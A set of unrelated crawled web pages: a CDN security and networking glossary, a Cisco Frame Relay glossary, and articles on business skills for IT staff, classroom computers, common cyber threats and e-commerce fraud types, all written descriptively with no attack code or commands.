Data Leakage Protection (DLP)
The term Data Leakage Protection refers, generally, to tools and services that typically monitor outbound data and make sure that it does not contain Sensitive Data Exposure, or a leakage of information into the wrong hands. Such tools typically block the flow of outgoing data or remove the sensitive information from it. A good WAF should contain a module for outbound data inspection.
A Dictionary Attack is a “softer” version of a Brute Force attack in which the access attempts are based on dictionaries of commonly used passwords, such as “1234”, to locate and penetrate accounts or other resources with weak passwords.
Distributed Denial of Service attacks (DDoS)
DDOS attacks are attacks with various methods designed to take a site or an online service down and make it inaccessible to users. One common method is directing a large number of requests simultaneously at the target website so that it becomes overwhelmed and exhausts its resources.
Domain Name System (DNS)
The domain name system (DNS) is a naming convention for computers, services, or any other system or resource on the Internet or in a private network. Essentially, domain names are translated into IP addresses for the purposes of routing traffic and identifying users worldwide.
See also: DNS Security
HTTPS & HTTPS
Hypertext Transfer Protocol (HTTP) is an application-layer protocol for transmitting hypermedia files, such as HTML. It was designed for communication between web browsers and web servers. HTTP is the foundation of data communication for the World Wide Web, where hypertext documents (e.g. hyperlinks) can be accessed by users easily. Hypertext Transfer Protocol Secure (HTTPS) is an extension of HTTP. It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security.
- HTTP is unsecured while HTTPS is secured.
- HTTP operates at application layer, while HTTPS operates at transport layer and uses TLS/SSL certificate to ensure authentication..
See also: How to distribute and utilize videos
Images and Resolutions
Resolutions refers to the sharpness and clarity of an image. It often used to describe monitors, printers, and bit-mapped graphic images. Websites with plain texts are rarely seen these days. Images can improve engagement, due to higher resolution screens image size has increased. Therefore, website performance is slowed down by high resolution images.
Also see: Web Performance
Infrastructure as a Service (IaaS)
Infrastructure as a service (IaaS) is a form of cloud computing that provides virtualized computing resources over the internet. Traditional IT infrastructure such as server hardware are provided by the cloud and it reduced the requirement for purchasing and maintaining private IT infrastructure. Alongside IaaS, software as a service (SaaS) and platform as a service (PaaS), are the three main categories of cloud computing.
Injections refers to adding (or “injecting”) commands to inputs that a software application or a SaaS expects to receive from users, such as on forms, or APIs, with the intention that these commands will be executed by an underlying component or service, gaining control over that component, extracting data from it, or other malicious acts.
this obviates the need for “etc.” because it indicates that the following are examples.
Load balancing refers to the process of distributing requests and tasks over a set of servers, which aims to make the overall processing more efficient. As a result, avoiding a single server becomes overwhelmed by web traffic.
Man in the Browser (MitB)
Man in the Browser attacks are almost identical to MitM attacks, but instead of being located somewhere on the network between the two parties, the attacker penetrates the browser of one party, typically by using a malicious browser extension or an app installed on that user’s device. This access to the user’s browser allows the 3rd party to eavesdrop or modify data exchanged between the user and a website.
Man in the Middle (MitM)
In a Man in the Middle attack, a hacker intercepts the traffic between two communicating parties. In some cases, such an infiltrator would need to pass the messages between the parties and thus to pretend to be the first party when communicating a message to the second one and vice versa. Such an interception can be used either to eavesdrop and/or to modify the data sent between the parties. Generally, a combination of encryption (such as TLS/SSL) and certificates are used to prevent this.
Media streaming is video and audio content over the Internet being constantly received and presented to viewers. Media files are normally managed by media companies.
See also: Media Delivery
OWASP Top 10
OWASP stands for the Open Web Application Security Project. It is a global non-profit foundation of security specialists and other volunteers, famous for publishing a list of the highest security risks for web applications, known as “OWASP Top 10”.
Protocol DDoS Attacks
These attacks target weaknesses in protocols such as TCP/IP (network layer attacks) and HTTP (application layer attacks) or their implementations. Typically, these attacks exploit scenarios in which a server gets a packet or a request from a computer and will expect further communication. The server allocates memory and resources to maintain the session state and the communication channel, which is abused by intentionally slowing down or halting communication and draining such resources.
Web Scraping is an automated process designed to extract public data from websites by making multiple requests to different web pages or resources. Scraping can be categorized as an exploitation of computer resources and of business data, but is not an “attack” per se, since typically the scraped data is exposed to users and not restricted.
Software Defined WAN (SD-WAN) is the next generation of WANs: It offers a completely new way of managing and operating your WAN infrastructure. This managed, secure, SD-WAN connectivity solution delivers seamless connections and optimised user experience without sacrificing security.
SD-WAN addresses to many IT challenges. This approach to network connectivity can lower operational costs significantly and improve resource usage for mult-isite deployment. Bandwidth can be used more efficiently by network administrators and it can help ensure high levels of performance for critical applications without compromising security or data privacy.
Also see: What SD-WAN means for your Business
Sensitive Data Exposure (Data Leakage)
A sensitive data leakage refers to a security breach incident category, rather than a specific type of vulnerability or attack. Such an incident takes place whenever a site or a service is exploited already and sends sensitive data into the wrong hands. The data typically includes personal identifying information, credit card numbers, financial information or other private data.
SQL Injection (SQLi)
SQL Injection is a common type of Injection, in which the attacker sends SQL commands to a software application or site interface to target a Database Server that may be serving the software or service being hacked.
Video Streaming is the transmission of video files from a server to a viewer continuously. Therefore, online video is transferred in real time as is consumed. Streaming is opposite to downloading. Streaming happens in real-time. If a video file is downloaded, viewer needs to safe a copy of that entire file on the device and video cannot play until downloading finishes. Whereas, if a video file is streamed, it is played without actually copying any files.
See also: Media Acceleration Live Broadcast
VOD refers to Video On Demand. VOD is a media distribution system that allows viewers to access videos without traditional video entertainment device or static broadcasting schedule. Videos can be downloaded to devices for continued viewing, or can be streamed.
Also see: Media Acceleration
Virtual machine (VM) is software and emulates a computer system. VM is based on computer architectures and provides computer or server functions. Its implementation involves specialized hardware, software, or a combination.
Virtual Private Server (VPS)
A virtual private server (VPS) is a virtual machine that used as a server such as providing processing power to client machines. VDS (virtual dedicated server) also means the same.
Volumetric DDoS Attacks
These attacks, measured either in Gigabits (or even Terrabits) of inbound traffic per second in the network layer or HTTP/s requests per second in the application layer, typically use distributed resources, such as hijacked computing devices and botnets,. to generate more traffic then the targeted system can absorb. Network layer attacks (L3/L4) typically target the network capacity with a flood of “meaningless” network packets while Application layer attacks (L7) target server resources such as memory or Input/Output capacities through a flood of requests that will be executed and responded by the attacked servers, until systems resources are exhausted. | <urn:uuid:c3922f6c-d7dc-4605-a859-76b0731d2a0e> | CC-MAIN-2022-40 | https://www.cdnetworks.com/glossary/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00354.warc.gz | en | 0.91569 | 2,854 | 2.859375 | 3 |
The role of IT has transformed from business supporter to business enabler to full-fledged business partner. This is reflected in ITIL v3, which places priority on managing IT services according to business needs. With this increased emphasis on alignment and communication between IT and the business, it is more important than ever that technically-proficient IT practitioners also understand the disciplines that make up the business.
The following overview will not immediately qualify anyone for an MBA. But it provides some initial insight into 10 aspects of business that are essential for IT practitioners to understand. So whether you aspire to be CIO, create the newest internet startup, take the lead in developing an enterprise application, or just get a leg up in your career, it’s not enough to just know technology. You must also know business.
Accounting is the process of collecting, classifying, interpreting, and reporting performance data, usually financial in nature. An accountant utilizes tools such as a balance sheet, income statement, and a cash flow statement to report and analyze the result of business activities. These are commonly known as financial statements.
Accounting, however, is not limited to the world of financial data. IT practitioners also may use similar processes to better understand their computing environments. For example, several operating systems have an accounting function that collects usage data. Similar functionality exists in local- and wide-area network management tools. This IT accounting data is useful for auditing, trend analysis, capacity planning, chargeback, and cost allocation.
Economics focuses on the study of supply and demand and the allocation of resources. A basic understanding of economic theory can be a useful tool in managing your IT organization. For example, can you accurately predict demand for your support desk? This may be vital to proper staffing levels, which if set too high may exceed your budget, or if too low, affect customer satisfaction.
If you run your IT shop as a profit center, here is a tip that may help you set the appropriate pricing levels. What is the “switching cost” of your customers? In other words, how easily can a customer change to a competing product or service without disrupting their business? If the switching cost is high, prices can often be raised to a certain point without fear of losing the customer, at least in theory.
Although IT practitioners may not be concerned with financial issues on a day-to-day basis, understanding financial concepts may be crucial to their role and career. Finance is generally concerned with the management of money. Often called both an art and a science, finance looks at an investment or capital expenditure and then determines the potential return or profit using a variety of techniques.
Within your IT organization, you may have performed financial tasks perhaps more often than you realize. Have you ever proposed a new technology project or the replacement of a legacy system? You probably had to include some sort of analysis as to why that money should be spent.
The IT practitioner may think of a project in qualitative terms such as reducing support costs or increasing capability. A financial manager, however, will look at the project quantitatively by analyzing the cost of making the investment—including the source of funds—and the potential return in terms of added value to the company (known as return on equity) or increased profitability (known as return on capital).
Most corporate IT organizations today operate globally and/or work with partners from around with world. Large IT shops, in particular, routinely work with offshore developers, international customers and team members in multiple time zones.
Even if your organization is local in scope, knowledge of international business is essential. Your business may have a contact center that operates in another country. It may use contract labor from a developing market. And your company is almost certainly looking to export goods overseas. | <urn:uuid:b87889ba-6025-48fd-a166-daa1fa5ef617> | CC-MAIN-2022-40 | https://cioupdate.com/understanding-the-10-fundamentals-of-any-business-3/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00354.warc.gz | en | 0.951968 | 780 | 2.640625 | 3 |
This document defines common Frame Relay terms.
There are no specific requirements for this document.
This document is not restricted to specific software or hardware versions.
For more information on document conventions, see the Cisco Technical Tips Conventions.
access line—A communications line (for example, a circuit) interconnecting a Frame-Relay-compatible device (DTE) to a Frame Relay switch (DCE). See also “trunk line” below.
access rate (AR)—The data rate of the user access channel. The speed of the access channel determines how rapidly (the maximum rate) that the end user can inject data into a Frame Relay network.
American National Standards Institute (ANSI)—A private, non-profit organization that administers and coordinates the U.S. voluntary standardization and conformity assessment system by devising and proposing recommendations for international communications standards. See also “International Telecommunication Union Telecommunication Standardization Sector” (ITU-T, formerly Consultative Committee for International Telegraph and Telephone [CCITT]) below.
backward explicit congestion notification (BECN)—A bit sent in reverse direction to the data flow. It is set by a Frame Relay network to notify an interface device (DTE) that congestion avoidance procedures should be initiated by the sending device.
bandwidth—The range of frequencies, expressed in kilobits per second (kbps), that can pass over a given data transmission channel within a Frame Relay network. The bandwidth determines the rate at which information can be sent through a channel: the greater the bandwidth, the more information that can be sent in a given amount of time.
bridge—A device that supports LAN-to-LAN communications. Bridges may be equipped to provide Frame Relay support to the LAN devices that they serve. A Frame-Relay-capable bridge encapsulates LAN frames in Frame Relay frames and feeds those Frame Relay frames to a Frame Relay switch for transmission across the network. A Frame-Relay-capable bridge also receives Frame Relay frames from the network, strips the Frame Relay frame off each LAN frame, and passes the LAN frame on to the end device. Bridges are generally used to connect LAN segments to other LAN segments or to a WAN. They route traffic on the Layer 2 (L2) LAN protocol (for example, the MAC address), which occupies the lower sublayer of the LAN Open System Interconnection (OSI) data-link layer. See also “router” below.
burstiness—In the context of a Frame Relay network, data that uses bandwidth only sporadically; that is, information that does not use the total bandwidth of a circuit 100 percent of the time. During pauses, channels are idle and no traffic flows across them in either direction. Interactive and LAN-to-LAN data is bursty in nature because it is sent intermittently. Between data transmissions, the channel experiences idle time waiting for the DTEs to respond to the transmitted data user’s input and waiting for the user to send more data.
channel—Generally, channel refers to the user access channel across which Frame Relay data travels. Within a given T1 or E1 physical line, a channel can be one of the following, depending upon how the line is configured:
unchannelized—The entire T1 or E1 line is considered a channel, where the following is true:
The T1 line operates at speeds of 1.536 Mbps and is a single channel consisting of 24 T1 time slots.
The E1 line operates at speeds of 1.984 Mbps and is a single channel consisting of 30 or 31 E1 time slots, depending upon the application.
channelized—The channel is any one of n time slots within a given line, where the following is true:
The T1 line consists of any one, or more, channels. Each channel is any one of 24 time slots. The T1 line operates at speeds in multiples of 56 or 64 Kbps to 1.536 Mbps, with aggregate speed not exceeding 1.536Mbps.
The E1 line consists of one or more channels. Each channel is any one of 30 or 31 time slots. The E1 operates at speeds in multiples of 64 Kbps to 1.984 Mbps, with aggregate speed not exceeding 1.984 Mbps.
fractional—The T1 or E1 channel is one of the following groupings of consecutively or non-consecutively assigned time slots:
n T1 time slots (n × 56 or 64Kbps, where n is equal to 1 to 23 T1 time slots per T1 channel).
n E1 time slots (n × 64Kbps, where n is equal to 1 to 30 time slots per E1 channel).
channel service unit (CSU)—An ancillary device needed to adapt the V.35 interface on a Frame Relay DTE to the T1 (or E1) interface on a Frame Relay switch. The T1 (or E1) signal format on the Frame Relay switch is not compatible with the V.35 interface on the DTE; therefore, a CSU or similar device, placed between the DTE and the Frame Relay switch, is needed to perform the required conversion.
committed burst size (Bc)—The maximum amount of data (in bits) that the network agrees to transfer, under normal conditions, during a time interval Tc. See also “excess burst size (Be)” below.
Consultative Committee for International Telegraph and Telephone (CCITT)—See “International Telecommunication Union Telecommunication Standardization Sector (ITU-T)” below.
committed information rate (CIR)—The rate at which a Frame Relay network agrees to transfer information under normal conditions, averaged over time interval Tc. CIR, measured in bits per second (bps), is one of the key negotiated tariff metrics.
committed rate measurement interval (Tc)—The time interval during which the user can send only Bc-committed amount of data and Be-excess amount of data. In general, the duration of Tc is proportional to the burstiness of the traffic. Tc is computed (from the subscription parameters of CIR and Bc) with the formula Tc = Bc ÷ CIR. Tc is not a periodic time interval. Instead, it is used only to measure incoming data, during which it acts like a sliding window. Incoming data triggers the Tc interval, which continues until it completes its commuted duration. See also “committed information rate (CIR)” and “committed burst size (Bc)” above.
cyclic redundancy check (CRC)—A computational means to ensure the accuracy of frames transmitted between devices in a Frame Relay network. The mathematical function is computed, before the frame is transmitted, at the originating device. Its numerical value is computed based on the content of the frame. This value is compared with a re-computed value of the function at the destination device. There is no limit to the size of the frame to which the CRC can be applied; when the frame length increases, however, so does the probability that an undetected error may occur. Frame Relay uses CRC-16, a 16-bit Frame Check Sequence (FCS) that will detect all types of bit errors for frames less than 4096 bytes in length. As the frames get larger, rare erroroneous bit patterns can occur that the CRC-16 will not detect. See also “frame check sequence (FCS)” below.
data communications equipment (DCE)—Defined by both the Frame Relay and the X.25 committees, DCE applies to switching equipment and is distinguished from devices that attach to the network (DTE). See also “end device” below.
data-link connection identifier (DLCI)—A unique number assigned to a permanent virtual circuit (PVC) end point in a Frame Relay network. Identifies a particular PVC endpoint within a user’s access channel in a Frame Relay network and has local significance only to that channel.
discard eligibility (DE)—A user-set bit indicating that a frame may be discarded in preference to other frames if congestion occurs, to maintain the committed quality of service within the network. The network side can also set the DE bit and, on congestion, will first drop frames that have this DE bit set. Frames with the DE bit set are considered “Be-excess” data. See also “excess burst size (Be)” below.
E1—Transmission rate of 2.048 Mbps on E1 communications lines. An E1 facility carriers a 2.048 Mbps digital signal. See also T1 below and Channel above.
egress—Frame Relay frames which leave a Frame Relay network heading toward the destination device. Contrast with “ingress” below.
end device—The ultimate source or destination of data flowing through a Frame Relay network, sometimes referred to as Data Terminal Equipment (DTE). As a source device, it sends data to an interface device for encapsulation in a Frame Relay frame. As a destination device, it receives de-encapsulated data from the interface device (in other words, the Frame Relay frame is stripped off, leaving only the user’s data). An end device can be an application program or some operator-controlled device (for example, a workstation). In a LAN environment, the end device can be a file server or a host. See also “data communications equipment (DCE)” above.
encapsulation—A process by which an interface device places the protocol-specific frames of an end device inside a Frame Relay frame. The network accepts only those frames formatted specifically for Frame Relay; hence, devices acting as interfaces to a Frame Relay network must perform encapsulation. See also “interface device” or “Frame-Relay-capable interface device” below.
excess burst size (Be)—The maximum amount of uncommitted data (in bits) in excess of Bc that a Frame Relay network can attempt to deliver during a time interval Tc. Generally, Be data is delivered with a lower probability than Bc, and the network treats it as discard eligible. See also “committed burst size (Bc)” above.
file server—In the context of Frame Relay network supporting LAN-to-LAN communications, a device connecting a series of workstations within a given LAN. The device performs error recovery and flow control functions, as well as end-to-end acknowledgment of data during data transfer, thereby significantly reducing overhead within the Frame Relay network.
forward explicit congestion notification (FECN)—A bit sent in the same direction as the data flow. It is set by a Frame Relay network to notify an interface device (DTE) that congestion avoidance procedures should be initiated by the receiving device. See also “backward explicit congestion notification (BECN)” above.
frame check sequence (FCS)—A 16-bit field for the CRC used in High-Level Data Link Control (HDLC) and Frame Relay frames. The FCS is used to detect bit errors that may occur during transmission of the frame. The bits between the opening flag and the FCS are checked. See also “cyclic redundancy check (CRC)” above.
Frame-Relay-capable interface device—A communications device that performs encapsulation. Frame-Relay-capable routers and bridges are examples of interface devices used to interface the customer’s equipment to a Frame Relay network. See also “interface device” below and “encapsulation” above.
Frame Relay frame—A variable-length unit of data, in Frame Relay format, that is transmitted through a Frame Relay network as pure data. Contrast with “packet” below. See also “Q.922 Annex A (Q.992A)” below.
Frame Relay network—A telecommunications network based on Frame Relay technology. Data is multiplexed. Contrast with “packet-switching network” below.
high-level data link control (HDLC)—A generic link-level communications protocol developed by the International Organization for Standardization (ISO). HDLC manages synchronous, code-transparent, serial information transfer over a link connection. See also “Synchronous Data Link Control (SDLC)” below.
hop—A single trunk line between two switches in a Frame Relay network. An established PVC consists of a certain number of hops, spanning the distance from the ingress access interface to the egress access interface within the network.
host computer—A communications device that enables users to run applications to perform such functions as text editing, program execution, access to databases, and so on.
ingress—Frame Relay frames heading from an access device toward the Frame Relay network. Contrast with “egress” above.
interface device—A device that provides the interface between the end device (or devices) and a Frame Relay network by encapsulating the user’s native protocol in Frame Relay frames and sending the frames across the Frame Relay backbone. See also “encapsulation” and “Frame-Relay-capable interface device” above.
International Telecommunication Union Telecommunication Standardization Sector (ITU-T)—A standards organization that devises and proposes recommendations for international communications. Formerly known as Comite Consultatif International Telegraphique et Telephonique (CCITT). See also “American National Standards Institute (ANSI)” above.
Link Access Procedure, Balanced (LAPB)—The balanced-mode, enhanced version of HDLC used in X.25 packet-switching networks. Contrast with “Link Access Procedure on the D-channel (LAPD)” below.
Link Access Procedure on the D-channel (LAPD)—A protocol that operates at the data-link layer (L2) of the OSI architecture. LAPD is used to convey information between Layer 3 (L3) entities across the Frame Relay network. The D-channel carries signaling information for circuit switching. Contrast with “Link Access Procedure, Balanced (LAPB)” above.
local area network (LAN)—A privately owned network that offers high-speed communications channels to connect information processing equipment in a limited geographic area.
LAN protocols—A range of LAN protocols supported by a Frame Relay network, including Transmission Control Protocol/Internet Protocol (TCP/IP), Apple Talk, Xerox Network System (XNS), Internetwork Packet Exchange (IPX), and Common Operating System used by DOS-based PCs.
LAN segment—In the context of a Frame Relay network supporting LAN-to-LAN communications, a LAN linked to another LAN by a bridge. Bridges enable two LANs to function like a single, large LAN by passing data from one LAN segment to another. To communicate with each other, the bridged LAN segments must use the same native protocol. See also “bridge” above.
Local Management Interface (LMI)—A set of enhancements to the basic Frame Relay specification. LMI includes support for a keepalive mechanism, which verifies that data is flowing, and for a status mechanism, which provides an on-going status report on the DLCIs known to the switch. There are three types of LMI: The Frame Relay Forum’s LMI, ANSI T1.617 (Annex D), and CCITT Q922 (Annex A).
packet—A group of fixed-length binary digits—including the data and call control signals—that are transmitted as a composite whole through an X.25 packet-switching network. The data, call control signals, and possible error control information are arranged in a predetermined format. Packets do not always travel the same pathway; rather, they are arranged in proper sequence at the destination side before forwarding the complete message to an addressee. Contrast with “Frame Relay frame” above.
packet-switching network—A telecommunications network based on packet-switching technology, wherein a transmission channel is occupied only for the duration of the transmission of the packet. Contrast with “Frame Relay network” above.
parameter—A numerical code that controls an aspect of terminal or network operation, such aspects as page size, data transmission speed, and timing options.
permanent virtual circuit (PVC)—A Frame Relay logical link whose endpoints and class of service are defined by network management. Analogous to an X.25 permanent virtual circuit, a PVC consists of the originating Frame Relay network element address, originating data-link control identifier, terminating Frame Relay network element address, and termination data-link control identifier. “Originating” refers to the access interface from which the PVC is initiated. “Terminating” refers to the access interface at which the PVC stops. Many data network customers require a PVC between two points. DTE that needs continuous communication uses PVCs. See also “data-link connection identifier (DLCI)” above.
Q.922 Annex A (Q.992A)—The international draft standard, based on the Q.922A frame format developed by the ITU-T, that defines the structure of Frame Relay frames. All Frame Relay frames entering a Frame Relay network automatically conform to this structure. Contrast with “Link Access Procedure, Balanced (LAPB)” above.
Q.922A frame—A variable-length unit of data, formatted in Frame Relay (Q.922A) format, that is transmitted through a Frame Relay network as pure data (that is, it contains no flow control information). Contrast with “packet” above. See also “Frame Relay frame” above.
router—A device that supports LAN-to-LAN communications. Routers may be equipped to provide Frame Relay support to the LAN devices they serve. A Frame-Relay-capable router encapsulates LAN frames in Frame Relay frames and feeds those Frame Relay frames to a Frame Relay switch for transmission across the network. A Frame-Relay-capable router also receives Frame Relay frames from the network, strips the Frame Relay frame off each frame to product the original LAN frame, and passes the LAN frame on to the end device. Routers connect multiple LAN segments to each other or to a WAN. Routers route traffic on the L3 LAN protocol (for example, the IP address). See also “bridge” above.
statistical multiplexing—A method of interleaving the data input of two or more devices on a single channel or access line for transmission through a Frame Relay network. Interleaving of data is accomplished using the DLCI.
switched virtual circuit (SVC)—A virtual circuit that is dynamically established on demand and is torn down when transmission is complete. SVCs are used in situations where data transmission is sporadic. Called a switched virtual connection in ATM terminology.
Synchronous Data Link Control (SDLC)—A link-level communications protocol used in an International Business Machines (IBM) Systems Network Architecture (SNA) network which manages synchronous, code-transparent, serial information transfer over a link connection. SDLC is a subset of the more generic HDLC protocol developed by the ISO.
T1—Transmission rate of 1.544 Mbps on T1 communications lines. A T1 facility carriers a 1.544 Mbps digital signal. Also referred to as digital signal level 1 (DS-1). See also “E1” and “channel” above.
trunk line—A communications line connecting two Frame Relay switches to each other. | <urn:uuid:bacb694d-7310-4502-8aa1-7ea0822f0474> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/support/docs/wan/frame-relay/47202-87.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00354.warc.gz | en | 0.87042 | 4,206 | 3.15625 | 3 |
As schools across the nation seek to integrate classroom computers within traditional lessons, institutions in Florida are facing new standards to accelerate the process. Officials have placed a deadline for the state's schools which requires that half of classroom materials must be presented on a digital platform by the fall of 2015.
This is causing considerable stress for educators in Florida, as they struggle to deploy classroom technologies in a way that is meaningful and benefits the lesson at hand as well as overall student learning. However, during the implementation process, there are a few challenges that must be addressed for successful utilization of classroom computers.
Challenge #1: Technology for technology's sake
Many schools, even those not required to do so by state lawmakers, are attracted by the prospects that technology, including classroom computers, smartboards and other systems, can offer. Experts recommend considering what issues the hardware might solve for the school, as well as what value the systems add in comparison to alternative arrangements. By considering these aspects, devices can be deployed for reasons beyond the "wow-factor" of today's technological tools.
Challenge #2: Funding
Another issue to be faced by educators and administrators is funding. Especially within a 1:1 initiative, classroom computers can be very expensive. Establishing monetary backing for these systems can be difficult if decision makers are unsure where to look. However, state and local programs including the Children's Internet Protect Act can provide capital for connectivity and other hardware if schools meet the requirements. Administrators need to explore their available options to see what assistance they may be able to achieve.
Challenge #3: Hesitation to migration
Whenever a new system is integrated, some individuals may be hesitant to such changes. The same is true for classroom technologies. It can be somewhat difficult for teachers, especially those less familiar with connected systems and Internet resources, to shift their lesson plans to include the hardware. However, with a little training before the classroom computers are introduced to students, educators can feel more comfortable and help pupils get used to the new systems.
Challenge #4: Student distractions
Another obstacle to address with the use of classroom computers is student distractions. When pupils work individually on projects, they can be tempted to stray from the assignment to surf the Web or visit social media sites. A classroom management software can help prevent this issue by providing better oversight of technological assets and ensure that students are utilizing them properly. | <urn:uuid:29f7fbec-c6a2-4fb4-bbf5-980bfbc75d53> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/top-challenges-with-the-implementation-of-classroom-computers | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00354.warc.gz | en | 0.956242 | 483 | 2.828125 | 3 |
On a daily basis, hundreds of billions of dollars worth of banking transactions happen in the online medium and providing security from cyber threats to these online transactions from hackers has become a booming industry.
If your computer doesn’t have antivirus software and a firewall, then there is a good chance your computer might be infected with a virus or a Trojan horse.
Hackers employ different strategies to steal your data and it includes but is not limited to credit card details, banking details, social security numbers, and email and social network credentials.
One of the most prevalent hacking methods used by hackers is botnets and, most of the time, the infected party doesn’t even know that they are infected. The creator of the bots remotely controls a set of software robots created to infect computers, known as zombies.
In 2010, an FBI investigation detected a cybercriminal ring that created a botnet called Zeus and used it to steal $70 million from different bank accounts in the United States.
A sudden increase in traffic, unauthorized connection attempts to command and communication servers, slow computing, using lots of CPU resources, an inability to access the internet, and getting messages from unidentified sources are some of the ways to detect botnets. Using anti-botnet tools, installing software patches, and regularly monitoring network traffic are some of the prevention methods.
Hackers gain unauthorized access to steal valuable information and may use this data to harm you in a personal or financial capacity. Most recently, hackers attacked KICKICO, a cryptocurrency trading exchange platform, gaining access to its servers to steal $7.7 million worth tokens. This is not the first time hackers attacked a cryptocurrency trading exchange and caused a lot of financial damage to the companies.
Many guides available on the internet to help customers to transact in a secured environment and CoinList provides one such guide on how to buy bitcoin gold.
Common Methods of Cyber threats Infection
One of the most common ways used to infect and damage a computer is malware. A term is a short form of ‘malicious software’, and it could refer to a virus, Trojan horse, worm, adware, and/or spyware. The best way to detect and prevent them is to use anti-malware software tools and protect your systems from being infected.
Another method involved in stealing data is phishing, and cybercriminals use this method more often as it takes little effort to deploy on target computers to produce results. Cybercriminals create fake emails, websites, and text messages that look like they’re from authenticated companies to make people part with their personal and financial information.
Cybercriminals use this data to cause financial damage to the targeted person or an entity. Always check the credentials of the website you are visiting and do not open emails from unknown sources.
It is better to take precautions and take assertive steps to prevent and protect your computer systems from malicious attacks & Cyber Threats. | <urn:uuid:eba2cb4d-01de-46f5-8f0e-914538c7513f> | CC-MAIN-2022-40 | https://gbhackers.com/common-cyber-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00554.warc.gz | en | 0.928246 | 603 | 3.140625 | 3 |
E-commerce revenue is constantly increasing, but the number of fraud cases, as well as the percentage of fraud in online transactions, is increasing faster still. But what types of fraud exist and—more importantly—how can we protect ourselves against them?
The Nilsen Report (1) uses the example of card-based payments to illustrate the point: Internet payment fraud is constantly increasing, and is, apparently, unstoppable. While the increase itself is nothing new (there has been more e-commerce fraud every year since 1993), the rate is impressive. The number of fraud cases has increased by 19 percent compared to 2013, and this is the fourth successive time that fraud growth has exceeded e-commerce growth. Out of every 100 USD in turnover, fraudsters currently snatch 5.65 cents.
Fraud is not exclusive to credit card payments, however. Criminals are becoming more sophisticated in their use of malware to command online banking logins via phones, tablets and computers, using the stolen bank account details to make fraudulent payments. “Alternative” payment methods are also attracting criminals. So what does this fraud look like, exactly? A study (2) asked 274 merchants from various industries in six countries precisely this question. The most common types of fraud are explained below.
According to the study (2), the most common types of fraud causing concern among merchants are identity theft (71 percent), phishing (66 percent) and account theft (63 percent). Here, credit cards are the most popular target, as a fraudster does not need much to carry out a “card not present” transaction.
In traditional identity theft, the criminals’ goal is to carry out transactions using a different identity. Instead of having to come up with a completely new identity to do this, they simply take over an existing one. This is easier to do—and usually much faster.
In order to commit identity theft or appropriate someone’s identity, fraudsters target personal information, such as names, addresses and email addresses, as well as credit card or account information. This enables them, for example, to order items online under a false name and pay using someone else’s credit card information or by debiting another person’s account. Phishing, on the other hand, simply involves using fraudulent websites, emails or text messages to access personal data. Another technical method is known as pharming, in which manipulated browsers direct unsuspecting customers to fraudulent websites. Often, all that is required to appropriate someone’s identity is a stolen password. This can be used to take over an existing account with an online shop – in most cases, the payment data is already stored in the account.
Of course, hacker attacks on e-commerce providers and stealing customer data also fall under this fraud category, as does using malware on computers to commit identity theft by spying out sensitive data. “Man-in-the-middle attacks” are even more sophisticated. These involve hackers muscling in on communications between customers and merchants (or between customers and banks) in order to siphon off login data.
We haven’t even mentioned the opportunities involved in intercepting credit cards sent by mail, for example, or in copying credit cards in restaurants and hotels or at cash machines. Already, though, the true extent of the identity theft problem is apparent.
In fourth place is what the merchants surveyed (2) refer to as “friendly fraud”. This sounds friendlier than it really is: using this method, customers order goods or services and pay for them – preferably using a “pull” payment method like a credit card or direct debit. Then, however, they deliberately initiate a chargeback, claiming that their credit card or account details were stolen. They are reimbursed—but they keep the goods or services. This fraud method is particularly prevalent with services, such as those in the gambling or adult milieus. Friendly fraud also tends to be combined with re-shipping. This is where criminals who use stolen payment data to pay for their purchases don’t want to have them sent to their home addresses. Instead, they use middlemen whose details are used to make the purchases and who then forward the goods.
Clean fraud’s name is misleading, because there’s nothing clean about it. The basic principle of clean fraud is that a stolen credit card is used to make a purchase, but the transaction is then manipulated in such a way that fraud detection functions are circumvented. Much more know-how is required here than with friendly fraud, where the only goal is to cancel the payment once a purchase has been made. In clean fraud, criminals use sound analyses of the fraud detection systems deployed, plus a great deal of knowledge about the rightful owners of their stolen credit cards. A great deal of correct information is then entered during the payment process so that the fraud detection solution is fooled. Before clean fraud is committed, card testing is often carried out. This involves making cheap test purchases online to check that the stolen credit card data works.
There are two variations of affiliate fraud, both of which have the same aim: to glean more money from an affiliate program by manipulating traffic or signup statistics. This can be done either using a fully automated process or by getting real people to log into merchants’ sites using fake accounts. This type of fraud is payment-method-neutral, but extremely widely distributed.
During triangulation fraud, the fraud is carried out via three points. The first is a fake online storefront, which offers high-demand goods at extremely low prices. In most cases, additional bait is added, like the information that the goods will only be shipped immediately if the goods are paid for using a credit card. The falsified shop collects address and credit card data – this is its only purpose. The second corner of the fraud triangle involves using other stolen credit card data and the name collected to order goods at a real store and ship them to the original customer. The third point in the fraud triangle involves using the stolen credit card data to make additional purchases. The order data and credit card numbers are now almost impossible to connect, so the fraud usually remains undiscovered for a longer period of time, resulting in greater damages.
Merchant fraud is another method which must be mentioned. It’s very simple: goods are offered at cheap prices, but are never shipped. The payments are, of course, kept. This method of fraud also exists in wholesale. It is not specific to any particular payment method, but this is, of course, where no-chargeback payment methods (most of the push payment types) come into their own.
More International Fraud
On average, the merchants who participated in the study (2) do business in 14 countries. According to 58 percent of those surveyed, the major challenge in fraud prevention is a lack of system integration to provide a unified view of all their transactions across all markets. 52 percent also see increased international transactions as a challenge. Almost exactly the same number (51 percent) have great difficulty in maintaining an overview of the various fraud prevention tools in different countries. Language barriers, as well as the difficulty of keeping international tabs on individual customers, pose additional fraud management challenges.
